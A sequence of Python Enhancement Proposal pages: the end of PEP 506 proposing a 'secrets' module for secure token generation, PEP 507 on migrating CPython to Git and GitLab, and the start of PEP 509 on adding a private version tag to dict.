The first [3] hit when searching for “python how to generate passwords” on
Google is a tutorial that uses the default functions from the random
module [4]. Although it is not intended for use in web applications, it is
likely that similar techniques find themselves used in that situation.
The second hit is to a StackOverflow question about generating
passwords [5]. Most of the answers given, including the accepted one, use
the default functions. When one user warned that the default could be
easily compromised, they were told “I think you worry too much.” [6]
This strongly suggests that the existing random module is an attractive
nuisance when it comes to generating (for example) passwords or secure
tokens.
Additional motivation (of a more philosophical bent) can be found in the
post which first proposed this idea [7].
Proposal
Alternative proposals have focused on the default PRNG in the random
module, with the aim of providing “secure by default” cryptographically
strong primitives that developers can build upon without thinking about
security. (See Alternatives below.) This proposes a different approach:
The standard library already provides cryptographically strong
primitives, but many users don’t know they exist or when to use them.
Instead of requiring crypto-naive users to write secure code, the
standard library should include a set of ready-to-use “batteries” for
the most common needs, such as generating secure tokens. This code
will both directly satisfy a need (“How do I generate a password reset
token?”), and act as an example of acceptable practices which
developers can learn from [8].
To do this, this PEP proposes that we add a new module to the standard
library, with the suggested name secrets. This module will contain a
set of ready-to-use functions for common activities with security
implications, together with some lower-level primitives.
The suggestion is that secrets becomes the go-to module for dealing
with anything which should remain secret (passwords, tokens, etc.)
while the random module remains backward-compatible.
API and Implementation
This PEP proposes the following functions for the secrets module:
Functions for generating tokens suitable for use in (e.g.) password
recovery, as session keys, etc., in the following formats:
as bytes, secrets.token_bytes;
as text, using hexadecimal digits, secrets.token_hex;
as text, using URL-safe base-64 encoding, secrets.token_urlsafe.
A limited interface to the system CSPRNG, using either os.urandom
directly or random.SystemRandom. Unlike the random module, this
does not need to provide methods for seeding, getting or setting the
state, or any non-uniform distributions. It should provide the
following:
A function for choosing items from a sequence, secrets.choice.
A function for generating a given number of random bits and/or bytes
as an integer, secrets.randbits.
A function for returning a random integer in the half-open range
0 to the given upper limit, secrets.randbelow [9].
A function for comparing text or bytes digests for equality while being
resistant to timing attacks, secrets.compare_digest.
The consensus appears to be that there is no need to add a new CSPRNG to
the random module to support these uses; SystemRandom will be
sufficient.
Some illustrative implementations have been given by Alyssa (Nick) Coghlan [10]
and a minimalist API by Tim Peters [11]. This idea has also been discussed
on the issue tracker for the “cryptography” module [12]. The following
pseudo-code should be taken as the starting point for the real
implementation:
import base64
import binascii
import os

from random import SystemRandom
from hmac import compare_digest

_sysrand = SystemRandom()

randbits = _sysrand.getrandbits
choice = _sysrand.choice

def randbelow(exclusive_upper_bound):
    return _sysrand._randbelow(exclusive_upper_bound)

DEFAULT_ENTROPY = 32  # bytes

def token_bytes(nbytes=None):
    if nbytes is None:
        nbytes = DEFAULT_ENTROPY
    return os.urandom(nbytes)

def token_hex(nbytes=None):
    return binascii.hexlify(token_bytes(nbytes)).decode('ascii')

def token_urlsafe(nbytes=None):
    tok = token_bytes(nbytes)
    return base64.urlsafe_b64encode(tok).rstrip(b'=').decode('ascii')
The secrets module itself will be pure Python, and other Python
implementations can easily make use of it unchanged, or adapt it as
necessary. An implementation can be found on BitBucket [13].
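For illustration, typical use of the proposed functions might look like the
following (the token sizes and alphabet are arbitrary choices, not part of
the specification):
import secrets
import string

reset_token = secrets.token_urlsafe(32)   # URL-safe token for a password-reset link
session_key = secrets.token_hex(16)       # hex-encoded session key

alphabet = string.ascii_letters + string.digits
char = secrets.choice(alphabet)           # one random character from the alphabet
n = secrets.randbelow(100)                # random integer in range(0, 100)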
Default arguments
One difficult question is “How many bytes should my token be?”. We can
help with this question by providing a default amount of entropy for the
“token_*” functions. If the nbytes argument is None or not given, the
default entropy will be used. This default value should be large enough
to be expected to be secure for medium-security uses, but is expected to
change in the future, possibly even in a maintenance release [14].
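In other words, callers with no particular requirement can simply omit the
argument; a short illustrative example:
import secrets

secrets.token_bytes()    # uses the default entropy (DEFAULT_ENTROPY, 32 in the pseudo-code above)
secrets.token_bytes(64)  # caller explicitly requests 64 bytes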
Naming conventions
One question is the naming conventions used in the module [15], whether to
use C-like naming conventions such as “randrange” or more Pythonic names
such as “random_range”.
Functions which are simply bound methods of the private SystemRandom
instance (e.g. randrange), or a thin wrapper around such, should keep
the familiar names. Those which are something new (such as the various
token_* functions) will use more Pythonic names.
Alternatives
One alternative is to change the default PRNG provided by the random
module [16]. This received considerable scepticism and outright opposition:
There is fear that a CSPRNG may be slower than the current PRNG (which
in the case of MT is already quite slow).
Some applications (such as scientific simulations, and replaying
gameplay) require the ability to seed the PRNG into a known state,
which a CSPRNG lacks by design.
Another major use of the random module is for simple “guess a number”
games written by beginners, and many people are loath to make any
change to the random module which may make that harder.
Although there is no proposal to remove MT from the random module,
there was considerable hostility to the idea of having to opt-in to
a non-CSPRNG or any backwards-incompatible changes.
Demonstrated attacks against MT are typically against PHP applications.
It is believed that PHP’s version of MT is a significantly softer target
than Python’s version, due to a poor seeding technique [17]. Consequently,
without a proven attack against Python applications, many people object
to a backwards-incompatible change.
Alyssa Coghlan made an earlier suggestion
for a globally configurable PRNG
which uses the system CSPRNG by default, but has since withdrawn it
in favour of this proposal.
Comparison To Other Languages
PHP
PHP includes a function uniqid [18] which by default returns a
thirteen character string based on the current time in microseconds.
def uniqid(prefix='', more_entropy=False)->str
The PHP documentation warns that this function is not suitable for
security purposes. Nevertheless, various mature, well-known PHP
applications use it for that purpose (citation needed).
PHP 5.3 and better also includes a function openssl_random_pseudo_bytes
[19]. Translated into Python syntax, it has roughly the following
signature:
def openssl_random_pseudo_bytes(length:int)->Tuple[str, bool]
This function returns a pseudo-random string of bytes of the given
length, and a boolean flag giving whether the string is considered
cryptographically strong. The PHP manual suggests that returning
anything but True should be rare except for old or broken platforms.
JavaScript
Based on a rather cursory search [20], there do not appear to be any
well-known standard functions for producing strong random values in
JavaScript. Math.random is often used, despite serious weaknesses
making it unsuitable for cryptographic purposes [21]. In recent years
the majority of browsers have gained support for window.crypto.getRandomValues [22].
Node.js offers a rich cryptographic module, crypto [23], most of
which is beyond the scope of this PEP. It does include a single function
for generating random bytes, crypto.randomBytes.
Ruby
The Ruby standard library includes a module SecureRandom [24]
which includes the following methods:
base64 - returns a Base64 encoded random string.
hex - returns a random hexadecimal string.
random_bytes - returns a random byte string.
random_number - depending on the argument, returns either a random
integer in the range(0, n), or a random float between 0.0 and 1.0.
urlsafe_base64 - returns a random URL-safe Base64 encoded string.
uuid - return a version 4 random Universally Unique IDentifier.
What Should Be The Name Of The Module?
There was a proposal to add a “random.safe” submodule, quoting the Zen
of Python “Namespaces are one honking great idea” koan. However, the
author of the Zen, Tim Peters, has come out against this idea [25], and
recommends a top-level module.
In discussion on the python-ideas mailing list so far, the name “secrets”
has received some approval, and no strong opposition.
There is already an existing third-party module with the same name [26],
but it appears to be unused and abandoned.
Frequently Asked Questions
Q: Is this a real problem? Surely MT is random enough that nobody can
predict its output.
A: The consensus among security professionals is that MT is not safe
in security contexts. It is not difficult to reconstruct the internal
state of MT [27] [28] and so predict all past and future values. There
are a number of known, practical attacks on systems using MT for
randomness [29].
Q: Attacks on PHP are one thing, but are there any known attacks on
Python software?
A: Yes. There have been vulnerabilities in Zope and Plone at the very
least. Hanno Schlichting commented [30]:
"In the context of Plone and Zope a practical attack was
demonstrated, but I can't find any good non-broken links about
this anymore. IIRC Plone generated a random number and exposed
this on each error page along the lines of 'Sorry, you encountered
an error, your problem has been filed as <random number>, please
include this when you contact us'. This allowed anyone to do large
numbers of requests to this page and get enough random values to
reconstruct the MT state. A couple of security related modules used
random instead of system random (cookie session ids, password reset
links, auth token), so the attacker could break all of those."
Christian Heimes reported this issue to the Zope security team in 2012 [31],
there are at least two related CVE vulnerabilities [32], and at least one
work-around for this issue in Django [33].
Q: Is this an alternative to specialist cryptographic software such as SSL?
A: No. This is a “batteries included” solution, not a full-featured
“nuclear reactor”. It is intended to mitigate against some basic
security errors, not be a solution to all security-related issues. To
quote Alyssa Coghlan referring to her earlier proposal [34]:
"...folks really are better off learning to use things like
cryptography.io for security sensitive software, so this change
is just about harm mitigation given that it's inevitable that a
non-trivial proportion of the millions of current and future
Python developers won't do that."
Q: What about a password generator?
A: The consensus is that the requirements for password generators are too
variable for it to be a good match for the standard library [35]. No password
generator will be included in the initial release of the module; instead it
will be given in the documentation as a recipe (à la the recipes in the
itertools module) [36].
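Such a recipe might look roughly like the following sketch (the alphabet and
length are arbitrary choices, and this is not the recipe that will ship in the
documentation):
import secrets
import string

def generate_password(length=12):
    # Draw each character independently from the system CSPRNG.
    alphabet = string.ascii_letters + string.digits
    return ''.join(secrets.choice(alphabet) for _ in range(length))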
Q: Will secrets use /dev/random (which blocks) or /dev/urandom (which
doesn’t block) on Linux? What about other platforms?
A: secrets will be based on os.urandom and random.SystemRandom,
which are interfaces to your operating system’s best source of cryptographic
randomness. On Linux, that may be /dev/urandom [37], on Windows it may be
CryptGenRandom(), but see the documentation and/or source code for the
implementation details.
References
[1]
https://mail.python.org/pipermail/python-ideas/2015-September/035820.html
[2]
https://docs.python.org/3/library/random.html
[3]
As of the date of writing. Also, as Google search terms may be
automatically customised for the user without their knowledge, some
readers may see different results.
[4]
http://interactivepython.org/runestone/static/everyday/2013/01/3_password.html
[5]
http://stackoverflow.com/questions/3854692/generate-password-in-python
[6]
http://stackoverflow.com/questions/3854692/generate-password-in-python/3854766#3854766
[7]
https://mail.python.org/pipermail/python-ideas/2015-September/036238.html
[8]
At least those who are motivated to read the source code and documentation.
[9]
After considerable discussion, Guido ruled that the module need only
provide randbelow, and not similar functions randrange or
randint. http://code.activestate.com/lists/python-dev/138375/
[10]
https://mail.python.org/pipermail/python-ideas/2015-September/036271.html
[11]
https://mail.python.org/pipermail/python-ideas/2015-September/036350.html
[12]
https://github.com/pyca/cryptography/issues/2347
[13]
https://bitbucket.org/sdaprano/secrets
[14]
https://mail.python.org/pipermail/python-ideas/2015-September/036517.html
https://mail.python.org/pipermail/python-ideas/2015-September/036515.html
[15]
https://mail.python.org/pipermail/python-ideas/2015-September/036474.html
[16]
Link needed.
[17]
By default PHP seeds the MT PRNG with the time (citation needed),
which is exploitable by attackers, while Python seeds the PRNG with
output from the system CSPRNG, which is believed to be much harder to
exploit.
[18]
http://php.net/manual/en/function.uniqid.php
[19]
http://php.net/manual/en/function.openssl-random-pseudo-bytes.php
[20]
Volunteers and patches are welcome.
[21]
http://ifsec.blogspot.fr/2012/05/cross-domain-mathrandom-prediction.html
[22]
https://developer.mozilla.org/en-US/docs/Web/API/RandomSource/getRandomValues
[23]
https://nodejs.org/api/crypto.html
[24]
http://ruby-doc.org/stdlib-2.1.2/libdoc/securerandom/rdoc/SecureRandom.html
[25]
https://mail.python.org/pipermail/python-ideas/2015-September/036254.html
[26]
https://pypi.python.org/pypi/secrets
[27]
https://jazzy.id.au/2010/09/22/cracking_random_number_generators_part_3.html
[28]
https://mail.python.org/pipermail/python-ideas/2015-September/036077.html
[29]
https://media.blackhat.com/bh-us-12/Briefings/Argyros/BH_US_12_Argyros_PRNG_WP.pdf
[30]
Personal communication, 2016-08-24.
[31]
https://bugs.launchpad.net/zope2/+bug/1071067
[32]
http://www.cvedetails.com/cve/CVE-2012-5508/
http://www.cvedetails.com/cve/CVE-2012-6661/
[33]
https://github.com/django/django/commit/1525874238fd705ec17a066291935a9316bd3044
[34]
https://mail.python.org/pipermail/python-ideas/2015-September/036157.html
[35]
https://mail.python.org/pipermail/python-ideas/2015-September/036476.html
https://mail.python.org/pipermail/python-ideas/2015-September/036478.html
[36]
https://mail.python.org/pipermail/python-ideas/2015-September/036488.html
[37]
http://sockpuppet.org/blog/2014/02/25/safely-generate-random-numbers/
http://www.2uo.de/myths-about-urandom/
Copyright
This document has been placed in the public domain.
| Final | PEP 506 – Adding A Secrets Module To The Standard Library | Standards Track | This PEP proposes the addition of a module for common security-related
functions such as generating tokens to the Python standard library. |
PEP 507 – Migrate CPython to Git and GitLab
Author:
Barry Warsaw <barry at python.org>
Status:
Rejected
Type:
Process
Created:
30-Sep-2015
Post-History:
Resolution:
Core-Workflow message
Table of Contents
Abstract
Rationale
Version Control System
Repository Hosting
Code Review
GitLab merge requests
Criticism
X is not written in Python
Mercurial is better than Git
CPython Workflow is too Complicated
Open issues
References
Copyright
Abstract
This PEP proposes migrating the repository hosting of CPython and the
supporting repositories to Git. Further, it proposes adopting a
hosted GitLab instance as the primary way of handling merge requests,
code reviews, and code hosting. It is similar in intent to PEP 481
but proposes an open source alternative to GitHub and omits the
proposal to run Phabricator. As with PEP 481, this particular PEP is
offered as an alternative to PEP 474 and PEP 462.
Rationale
CPython is an open source project which relies on a number of
volunteers donating their time. As with any healthy, vibrant open
source project, it relies on attracting new volunteers as well as
retaining existing developers. Given that volunteer time is the most
scarce resource, providing a process that maximizes the efficiency of
contributors and reduces the friction for contributions, is of vital
importance for the long-term health of the project.
The current tool chain of the CPython project is a custom and unique
combination of tools. This has two critical implications:
The unique nature of the tool chain means that contributors must
remember or relearn the process, workflow, and tools whenever they
contribute to CPython, without the advantage of leveraging long-term
memory and familiarity they retain by working with other projects in
the FLOSS ecosystem. The knowledge they gain in working with
CPython is unlikely to be applicable to other projects.
The burden on the Python/PSF infrastructure team is much greater in
order to continue to maintain custom tools, improve them over time,
fix bugs, address security issues, and more generally adapt to new
standards in online software development with global collaboration.
These limitations act as a barrier to contribution both for highly
engaged contributors (e.g. core Python developers) and especially for
more casual “drive-by” contributors, who care more about getting their
bug fix than learning a new suite of tools and workflows.
By proposing the adoption of both a different version control system
and a modern, well-maintained hosting solution, this PEP addresses
these limitations. It aims to enable a modern, well-understood
process that will carry CPython development for many years.
Version Control System
Currently the CPython and supporting repositories use Mercurial. As a
modern distributed version control system, it has served us well since
the migration from Subversion. However, when evaluating the VCS we
must consider the capabilities of the VCS itself as well as the
network effect and mindshare of the community around that VCS.
There are really only two viable options for this: Mercurial and Git.
The technical capabilities of the two systems are largely equivalent,
therefore this PEP instead focuses on their social aspects.
It is not possible to get exact numbers for the number of projects or
people which are using a particular VCS, however we can infer this by
looking at several sources of information for what VCS projects are
using.
The Open Hub (previously Ohloh) statistics [1] show that
37% of the repositories indexed by The Open Hub are using Git (second
only to Subversion which has 48%) while Mercurial has just 2%, beating
only Bazaar which has 1%. This has Git being just over 18 times as
popular as Mercurial on The Open Hub.
Another source of information on VCS popularity is PyPI itself. This
source is more targeted at the Python community itself since it
represents projects developed for Python. Unfortunately PyPI does not
have a standard location for representing this information, so this
requires manual processing. If we limit our search to the top 100
projects on PyPI (ordered by download counts) we can see that 62% of
them use Git, while 22% of them use Mercurial, and 13% use something
else. This has Git being just under 3 times as popular as Mercurial
for the top 100 projects on PyPI.
These numbers back up the anecdotal evidence for Git as the far more
popular DVCS for open source projects. Choosing the more popular VCS
has a number of positive benefits.
For new contributors it increases the likelihood that they will have already
learned the basics of Git as part of working with another project or if they
are just now learning Git, that they’ll be able to take that knowledge and
apply it to other projects. Additionally a larger community means more people
writing how-to guides, answering questions, and writing articles about Git
which makes it easier for a new user to find answers and information about the
tool they are trying to learn and use. Given its popularity, there may also
be more auxiliary tooling written around Git. This increases options for
everything from GUI clients, helper scripts, repository hosting, etc.
Further, the adoption of Git as the proposed back-end repository
format doesn’t prohibit the use of Mercurial by fans of that VCS!
Mercurial users have the hg-git plugin [2] which allows them to push
and pull from a Git server using the Mercurial front-end. It’s a
well-maintained and highly functional plugin that seems to be
well-liked by Mercurial users.
Repository Hosting
Where and how the official repositories for CPython are hosted is in
some ways determined by the choice of VCS. With Git there are several
options. In fact, once the repository is hosted in Git, branches can
be mirrored in many locations, within many free, open, and proprietary
code hosting sites.
It’s still important for CPython to adopt a single, official
repository, with a web front-end that allows for many convenient and
common interactions entirely through the web, without always requiring
local VCS manipulations. These interactions include as a minimum,
code review with inline comments, branch diffing, CI integration, and
auto-merging.
This PEP proposes to adopt a GitLab [3] instance, run within the
python.org domain, accessible to and with ultimate control from the
PSF and the Python infrastructure team, but donated, hosted, and
primarily maintained by GitLab, Inc.
Why GitLab? Because it is a fully functional Git hosting system, that
sports modern web interactions, software workflows, and CI
integration. GitLab’s Community Edition (CE) is open source software,
and thus is closely aligned with the principles of the CPython
community.
Code Review
Currently CPython uses a custom fork of Rietveld modified to not run
on Google App Engine and which is currently only really maintained by
one person. It is missing common features present in many modern code
review tools.
This PEP proposes to utilize GitLab’s built-in merge requests and
online code review features to facilitate reviews of all proposed
changes.
GitLab merge requests
The normal workflow for a GitLab hosted project is to submit a merge request
asking that a feature or bug fix branch be merged into a target branch,
usually one or more of the stable maintenance branches or the next-version
master branch for new features. GitLab’s merge requests are similar in form
and function to GitHub’s pull requests, so anybody who is already familiar
with the latter should be able to immediately utilize the former.
Once submitted, a conversation about the change can be had between the
submitter and reviewer. This includes both general comments, and inline
comments attached to a particular line of the diff between the source and
target branches. Projects can also be configured to automatically run
continuous integration on the submitted branch, the results of which are
readily visible from the merge request page. Thus both the reviewer and
submitter can immediately see the results of the tests, making it much easier
to only land branches with passing tests. Each new push to the source branch
(e.g. to respond to a commenter’s feedback or to fix a failing test) results
in a new run of the CI, so that the state of the request always reflects the
latest commit.
Merge requests have a fairly major advantage over the older “submit a patch to
a bug tracker” model. They allow developers to work completely within the VCS
using standard VCS tooling, without requiring the creation of a patch file or
figuring out the right location to upload the patch to. This lowers the
barrier for sending a change to be reviewed.
Merge requests are far easier to review. For example, they provide nice
syntax highlighted diffs which can operate in either unified or side by side
views. They allow commenting inline and on the merge request as a whole and
they present that in a nice unified way which will also hide comments which no
longer apply. Comments can be hidden and revealed.
Actually merging a merge request is quite simple, if the source branch applies
cleanly to the target branch. A core reviewer simply needs to press the
“Merge” button for GitLab to automatically perform the merge. The source
branch can be optionally rebased, and once the merge is completed, the source
branch can be automatically deleted.
GitLab also has a good workflow for submitting pull requests to a project
completely through their web interface. This would enable the Python
documentation to have “Edit on GitLab” buttons on every page. People who
discover things like typos or inaccuracies, or who just want to make
improvements to the docs they are currently reading, can simply hit that
button and get an in-browser editor that will let them make changes and
submit a merge request, all from the comfort of their browser.
Criticism
X is not written in Python
One feature that the current tooling (Mercurial, Rietveld) has is that the
primary language for all of the pieces are written in Python. This PEP
focuses more on the best tools for the job and not necessarily on the best
tools that happen to be written in Python. Volunteer time is the most
precious resource for any open source project and we can best respect and
utilize that time by focusing on the benefits and downsides of the tools
themselves rather than what language their authors happened to write them in.
One concern is the ability to modify tools to work for us; however, one of the
goals here is to not modify software to work for us and instead adapt
ourselves to a more standardized workflow. This standardization pays off in
the ability to re-use tools out of the box freeing up developer time to
actually work on Python itself as well as enabling knowledge sharing between
projects.
However, if we do need to modify the tooling, Git itself is largely written in
C the same as CPython itself. It can also have commands written for it using
any language, including Python. GitLab itself is largely written in Ruby and
since it is Open Source software, we would have the ability to submit merge
requests to the upstream Community Edition, albeit in a language potentially
unfamiliar to most Python programmers.
Mercurial is better than Git
Whether Mercurial or Git is better on a technical level is a highly subjective
opinion. This PEP does not state whether the mechanics of Git or Mercurial
are better, and instead focuses on the network effect that is available for
either option. While this PEP proposes switching to Git, Mercurial users are
not left completely out of the loop. By using the hg-git extension for
Mercurial, working with server-side Git repositories is fairly easy and
straightforward.
CPython Workflow is too Complicated
One sentiment that came out of previous discussions was that the multi-branch
model of CPython was too complicated for GitLab style merge requests. This
PEP disagrees with that sentiment.
Currently any particular change requires manually creating a patch for 2.7 and
3.x, which won’t change at all in this regard.
If someone submits a fix for the current stable branch (e.g. 3.5) the merge
request workflow can be used to create a request to merge the current stable
branch into the master branch, assuming there are no merge conflicts. As
always, merge conflicts must be manually and locally resolved. Because
developers also have the option of performing the merge locally, this
provides an improvement over the current situation where the merge must
always happen locally.
For fixes in the current development branch that must also be applied to
stable release branches, it is possible in many situations to locally cherry
pick and apply the change to other branches, with merge requests submitted for
each stable branch. It is also possible to just cherry-pick and complete the
merge locally. These are all accomplished with standard Git commands and
techniques, with the advantage that all such changes can go through the review
and CI test workflows, even for merges to stable branches. Minor changes may
be easily accomplished in the GitLab web editor.
No system can hide all the complexities involved in maintaining several long
lived branches. The only thing that the tooling can do is make it as easy as
possible to submit and commit changes.
Open issues
What level of hosted support will GitLab offer? The PEP author has been in
contact with the GitLab CEO, with positive interest on their part. The
details of the hosting offer would have to be discussed.
What happens to Roundup and do we switch to the GitLab issue tracker?
Currently, this PEP is not suggesting we move from Roundup to GitLab
issues. We have way too much invested in Roundup right now and migrating
the data would be a huge effort. GitLab does support webhooks, so we will
probably want to use webhooks to integrate merges and other events with
updates to Roundup (e.g. to include pointers to commits, close issues,
etc. similar to what is currently done).
What happens to wiki.python.org? Nothing! While GitLab does support wikis
in repositories, there’s no reason for us to migrate our Moin wikis.
What happens to the existing GitHub mirrors? We’d probably want to
regenerate them once the official upstream branches are natively hosted in
Git. This may change commit ids, but after that, it should be easy to
mirror the official Git branches and repositories far and wide.
Where would the GitLab instance live? Physically, in whatever hosting
provider GitLab chooses. We would point gitlab.python.org (or
git.python.org?) to this host.
References
[1]
Open Hub Statistics
[2]
Hg-Git mercurial plugin
[3]
https://about.gitlab.com
Copyright
This document has been placed in the public domain.
| Rejected | PEP 507 – Migrate CPython to Git and GitLab | Process | This PEP proposes migrating the repository hosting of CPython and the
supporting repositories to Git. Further, it proposes adopting a
hosted GitLab instance as the primary way of handling merge requests,
code reviews, and code hosting. It is similar in intent to PEP 481
but proposes an open source alternative to GitHub and omits the
proposal to run Phabricator. As with PEP 481, this particular PEP is
offered as an alternative to PEP 474 and PEP 462. |
PEP 509 – Add a private version to dict
Author:
Victor Stinner <vstinner at python.org>
Status:
Superseded
Type:
Standards Track
Created:
04-Jan-2016
Python-Version:
3.6
Post-History:
08-Jan-2016,
11-Jan-2016,
14-Apr-2016,
19-Apr-2016
Superseded-By:
699
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Guard example
Usage of the dict version
Speedup method calls
Specialized functions using guards
Pyjion
Cython
Unladen Swallow
Changes
Backwards Compatibility
Implementation and Performance
Integer overflow
Alternatives
Expose the version at Python level as a read-only __version__ property
Add a version to each dict entry
Add a new dict subtype
Prior Art
Method cache and type version tag
Globals / builtins cache
Cached globals+builtins lookup
Guard against changing dict during iteration
PySizer
Discussion
Acceptance
Copyright
Abstract
Add a new private version to the builtin dict type, incremented at
each dictionary creation and at each dictionary change, to implement
fast guards on namespaces.
Rationale
In Python, the builtin dict type is used by many instructions. For
example, the LOAD_GLOBAL instruction looks up a variable in the
global namespace, or in the builtins namespace (two dict lookups).
Python uses dict for the builtins namespace, globals namespace, type
namespaces, instance namespaces, etc. The local namespace (function
namespace) is usually optimized to an array, but it can be a dict too.
Python is hard to optimize because almost everything is mutable: builtin
functions, function code, global variables, local variables, … can be
modified at runtime. Implementing optimizations respecting the Python
semantics requires to detect when “something changes”: we will call
these checks “guards”.
The speedup of optimizations depends on the speed of guard checks. This
PEP proposes to add a private version to dictionaries to implement fast
guards on namespaces.
Dictionary lookups can be skipped if the version does not change, which
is the common case for most namespaces. The version is globally unique,
so checking the version is also enough to verify that the namespace
dictionary was not replaced with a new dictionary.
When the dictionary version does not change, the performance of a guard
does not depend on the number of watched dictionary entries: the
complexity is O(1).
Example of optimization: copy the value of a global variable to function
constants. This optimization requires a guard on the global variable to
check if it was modified after it was copied. If the global variable is
not modified, the function uses the cached copy. If the global variable
is modified, the function uses a regular lookup, and maybe also
deoptimizes the function (to remove the overhead of the guard check for
next function calls).
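A rough pure-Python sketch of this guarded caching, assuming the hypothetical
dict_get_version() helper introduced in the guard example below (all names
here are illustrative, not part of the proposal):
def cached_global(namespace, name):
    """Return a reader for namespace[name], guarded by the dictionary version."""
    cached_value = namespace[name]
    cached_version = dict_get_version(namespace)  # hypothetical helper

    def read():
        nonlocal cached_value, cached_version
        version = dict_get_version(namespace)
        if version == cached_version:
            # Fast path: the namespace was not modified, reuse the cached copy.
            return cached_value
        # Slow path: regular lookup, then refresh the cached copy and version.
        cached_value = namespace[name]
        cached_version = version
        return cached_value

    return read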
See PEP 510 – Specialized functions with guards for concrete usage of
guards to specialize functions and for a more general rationale on
Python static optimizers.
Guard example
Pseudo-code of a fast guard to check if a dictionary entry was modified
(created, updated or deleted) using a hypothetical
dict_get_version(dict) function:
UNSET = object()

class GuardDictKey:
    def __init__(self, dict, key):
        self.dict = dict
        self.key = key
        self.value = dict.get(key, UNSET)
        self.version = dict_get_version(dict)

    def check(self):
        """Return True if the dictionary entry did not change
        and the dictionary was not replaced."""

        # read the version of the dictionary
        version = dict_get_version(self.dict)
        if version == self.version:
            # Fast-path: dictionary lookup avoided
            return True

        # lookup in the dictionary
        value = self.dict.get(self.key, UNSET)
        if value is self.value:
            # another key was modified:
            # cache the new dictionary version
            self.version = version
            return True

        # the key was modified
        return False
Usage of the dict version
Speedup method calls
Yury Selivanov wrote a patch to optimize method calls. The patch depends on the
“implement per-opcode cache in ceval” patch which requires dictionary
versions to invalidate the cache if the globals dictionary or the
builtins dictionary has been modified.
The cache also requires that the dictionary version is globally unique.
It is possible to define a function in a namespace and call it in a
different namespace, using exec() with the globals parameter for
example. In this case, the globals dictionary was replaced and the cache
must also be invalidated.
Specialized functions using guards
PEP 510 proposes an API to support
specialized functions with guards. It makes it possible to implement static
optimizers for Python without breaking the Python semantics.
The fatoptimizer of the FAT
Python project
is an example of a static Python optimizer. It implements many
optimizations which require guards on namespaces:
Call pure builtins: to replace len("abc") with 3, guards on
builtins.__dict__['len'] and globals()['len'] are required
Loop unrolling: to unroll the loop for i in range(...): ...,
guards on builtins.__dict__['range'] and globals()['range']
are required
etc.
Pyjion
According to Brett Cannon, one of the two main developers of Pyjion,
Pyjion can benefit from dictionary version to implement optimizations.
Pyjion is a JIT compiler for
Python based upon CoreCLR (Microsoft .NET Core runtime).
Cython
Cython can benefit from dictionary version to implement optimizations.
Cython is an optimising static compiler for both
the Python programming language and the extended Cython programming
language.
Unladen Swallow
Even if dictionary version was not explicitly mentioned, optimizing
globals and builtins lookup was part of the Unladen Swallow plan:
“Implement one of the several proposed schemes for speeding lookups of
globals and builtins.” (source: Unladen Swallow ProjectPlan).
Unladen Swallow is a fork of CPython 2.6.1 adding a JIT compiler
implemented with LLVM. The project stopped in 2011: Unladen Swallow
Retrospective.
Changes
Add a ma_version_tag field to the PyDictObject structure with
the C type PY_UINT64_T, 64-bit unsigned integer. Add also a global
dictionary version.
Each time a dictionary is created, the global version is incremented and
the dictionary version is initialized to the global version.
Each time the dictionary content is modified, the global version must be
incremented and copied to the dictionary version. Dictionary methods
which can modify its content:
clear()
pop(key)
popitem()
setdefault(key, value)
__delitem__(key)
__setitem__(key, value)
update(...)
Whether or not to increase the version when a dictionary method
does not change its content is left to the Python implementation. A
Python implementation can decide to not increase the version to avoid
dictionary lookups in guards. Examples of cases when dictionary methods
don’t modify its content:
clear() if the dict is already empty
pop(key) if the key does not exist
popitem() if the dict is empty
setdefault(key, value) if the key already exists
__delitem__(key) if the key does not exist
__setitem__(key, value) if the new value is identical to the
current value
update() if called without argument or if new values are identical
to current values
Setting a key to a new value equal to the old value is also considered
an operation modifying the dictionary content.
Two different empty dictionaries must have a different version to be
able to identify a dictionary just by its version. It allows a guard to
verify that a namespace was not replaced without storing a strong
reference to the dictionary. Using a borrowed reference does not work:
if the old dictionary is destroyed, it is possible that a new dictionary
is allocated at the same memory address. By the way, dictionaries don’t
support weak references.
The version increase must be atomic. In CPython, the Global Interpreter
Lock (GIL) already protects dict methods to make changes atomic.
Example using a hypothetical dict_get_version(dict) function:
>>> d = {}
>>> dict_get_version(d)
100
>>> d['key'] = 'value'
>>> dict_get_version(d)
101
>>> d['key'] = 'new value'
>>> dict_get_version(d)
102
>>> del d['key']
>>> dict_get_version(d)
103
The field is called ma_version_tag, rather than ma_version, to
suggest to compare it using version_tag == old_version_tag, rather
than version <= old_version which becomes wrong after an integer
overflow.
Backwards Compatibility
Since the PyDictObject structure is not part of the stable ABI and
the new dictionary version not exposed at the Python scope, changes are
backward compatible.
Implementation and Performance
The issue #26058: PEP 509: Add ma_version_tag to PyDictObject contains a patch implementing
this PEP.
On pybench and timeit microbenchmarks, the patch does not seem to add
any overhead on dictionary operations. For example, the following timeit
micro-benchmark takes 318 nanoseconds before and after the change:
python3.6 -m timeit 'd={1: 0}; d[2]=0; d[3]=0; d[4]=0; del d[1]; del d[2]; d.clear()'
When the version does not change, PyDict_GetItem() takes 14.8 ns for
a dictionary lookup, whereas a guard check only takes 3.8 ns. Moreover,
a guard can watch for multiple keys. For example, for an optimization
using 10 global variables in a function, 10 dictionary lookups costs 148
ns, whereas the guard still only costs 3.8 ns when the version does not
change (39x as fast).
The fat module implements
such guards: fat.GuardDict is based on the dictionary version.
Integer overflow
The implementation uses the C type PY_UINT64_T to store the version:
a 64 bits unsigned integer. The C code uses version++. On integer
overflow, the version is wrapped to 0 (and then continues to be
incremented) according to the C standard.
After an integer overflow, a guard can succeed whereas the watched
dictionary key was modified. The bug only occurs at a guard check if
there are exactly 2 ** 64 dictionary creations or modifications
since the previous guard check.
If a dictionary is modified every nanosecond, 2 ** 64 modifications
takes longer than 584 years. Using a 32-bit version, it only takes 4
seconds. That’s why a 64-bit unsigned type is also used on 32-bit
systems. A dictionary lookup at the C level takes 14.8 ns.
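The figures above follow from a quick back-of-the-envelope calculation:
# One dictionary modification per nanosecond:
years_to_wrap_64bit = 2 ** 64 / 10 ** 9 / (3600 * 24 * 365.25)  # ~584.5 years
seconds_to_wrap_32bit = 2 ** 32 / 10 ** 9                       # ~4.3 seconds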
A risk of a bug every 584 years is acceptable.
Alternatives
Expose the version at Python level as a read-only __version__ property
The first version of the PEP proposed to expose the dictionary version
as a read-only __version__ property at Python level, and also to add
the property to collections.UserDict (since this type must mimic
the dict API).
There are multiple issues:
To be consistent and avoid bad surprises, the version must be added to
all mapping types. Implementing a new mapping type would require extra
work for no benefit, since the version is only required on the
dict type in practice.
All Python implementations would have to implement this new property;
it creates more work for other implementations, which may not use
the dictionary version at all.
